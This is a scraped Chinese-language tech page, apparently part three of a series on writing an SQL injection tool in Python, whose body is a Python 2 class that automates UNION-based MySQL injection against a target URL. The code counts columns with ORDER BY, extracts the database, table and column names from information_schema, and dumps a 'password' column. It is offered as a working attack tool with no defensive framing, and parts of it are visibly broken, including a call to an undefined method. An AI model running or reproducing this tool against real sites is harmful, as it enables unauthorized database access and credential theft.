首頁 > 開發者 > Python

Python編寫SQL注入工具(3)

來源:互聯網
上載者:User
創建阿里雲帳戶,並獲得超過 40 款產品的免費試用版;而企業帳戶則可以享有總值 $1200 的免費試用版。立即註冊!

標籤:

Mysql注入模組

#coding:gb2312import urllibimport stringimport binasciiimport reclass mysqlInject():    def __init__(self,url):        self.db=‘database()‘        self.url=url  #待檢測的網址        self.dblen=0  #資料庫的長度        self.counts=0 #欄位數        self.tables=[] #表        self.dbname=‘‘    # 檢測資料庫的版本    def judgeVersion(self):        page=urllib.urlopen(self.url).read()        sql=string.join([self.url,"%20and%20mid(version(),1,1)=523%"],‘‘)        pagex=urllib.urlopen(self.url).read()        if page==pagex:            print ‘MYSQL版本:>5‘        else:            print ‘MYSQL版本<5‘    #檢測欄位數    def columnCounts(self):        page=urllib.urlopen(self.url).read()        for n in range(1,100):            sql=string.join([self.url,"%20order%20by%20",str(n)],‘‘)            pagex=urllib.urlopen(sql).read()            if n==1:                if page==pagex:                    print ‘可以使用 order by 猜解‘                else:                    print ‘不能使用order by 猜解‘                    break            else:                if page!=pagex:                    self.counts=n-1                    print ‘欄位數:‘,self.counts                    break        if self.counts==0:            print ‘未能猜解出欄位數!‘    #爆出當前資料庫名,資料庫使用者    def inject5Content(self,sql):        url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘        for x in range(1,self.counts+1):            if x!=1:                url+=‘,‘            url+=‘concat(0x25,‘            url+=sql            url+=‘,0x25)‘        pagec=urllib.urlopen(url).read()        reg="%[a-z,0-9,A-Z,.,\-,\\,@,:]*%"        regob = re.compile(reg, re.DOTALL)        result = regob.findall(pagec)        if len(result)!=0:            strings=result[1]            strings=strings[1:len(strings)-1]            return strings    def inject5TableNames(self,DB):        url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘        for x in range(1,self.counts+1):            if x!=1:                url+=‘,‘            url+=‘concat(0x25,‘            url+=‘group_concat(distinct+table_name)‘            url+=‘,0x25)‘        url+=‘%20from%20information_schema.columns%20where%20table_schema=‘        url+=DB        pagec=urllib.urlopen(url).read()        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"        regob = re.compile(reg, re.DOTALL)        result = regob.findall(pagec)        if len(result)!=0:            strings=result[1]            strings=strings[1:len(strings)-1]            s=strings.split(‘,‘)            return s    #猜解欄位名    def inject5ColumnsName(self,TB):        url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘        for x in range(1,self.counts+1):            if x!=1:                url+=‘,‘            url+=‘concat(0x25,‘            url+=‘group_concat(distinct+column_name)‘            url+=‘,0x25)‘        url+=‘%20from%20information_schema.columns%20where%20table_name=‘        url+=TB        pagec=urllib.urlopen(url).read()        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"        regob = re.compile(reg, re.DOTALL)        result = regob.findall(pagec)        if len(result)!=0:            strings=result[1]            strings=strings[1:len(strings)-1]            s=strings.split(‘,‘)            return s    #猜欄位內容    def inject5CountContent(self,TN,CN):        url=self.url+‘%20and%201=2%20UNION%20SELECT%20‘        for x in range(1,self.counts+1):            if x!=1:                url+=‘,‘            url+=‘concat(0x25,‘            url+=CN            url+=‘,0x25)‘        url+=‘%20from%20‘        url+=TN        pagex=urllib.urlopen(url).read()        reg="%[a-z,0-9,A-Z,.,\,,\-,\\,@,:]*%"        regob = re.compile(reg, re.DOTALL)        result = regob.findall(pagex)        if len(result)!=0:            strings=result[1]            strings=strings[1:len(strings)-1]            print  CN,‘:‘,strings    #如果資料庫的版本大於4,可以使用‘查‘表的方法注入    def inject5(self):        d=‘database()‘        self.database=self.inject5Content(d)        print self.database        database0x=binascii.b2a_hex(self.database)        database0x=‘0x‘+database0x        print database0x        self.inject5TableName(database0x)        self.inject5TableNames(database0x)        tb=self.tables[0]        print ‘‘        tb=binascii.b2a_hex(tb)        tb=‘0x‘+tb        print tb        self.inject5ColumnsName(tb)        self.inject5CountContent(‘gly‘,‘password‘)

 

Python編寫SQL注入工具(3)

本文章原先以中文撰寫並發佈於 aliyun.com,亦設英文版本,僅作資訊用途。本網站不對文章的準確性,完整性或可靠性或其任何翻譯作出任何明示或暗示的陳述或保證。如對該文章有任何疑慮或投訴,請傳送電郵至 info-contact@alibabacloud.com 並提供相關疑慮或投訴的詳細說明。職員會於 5 個工作天內與您聯絡,一經驗證之後,即會刪除該侵權內容。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More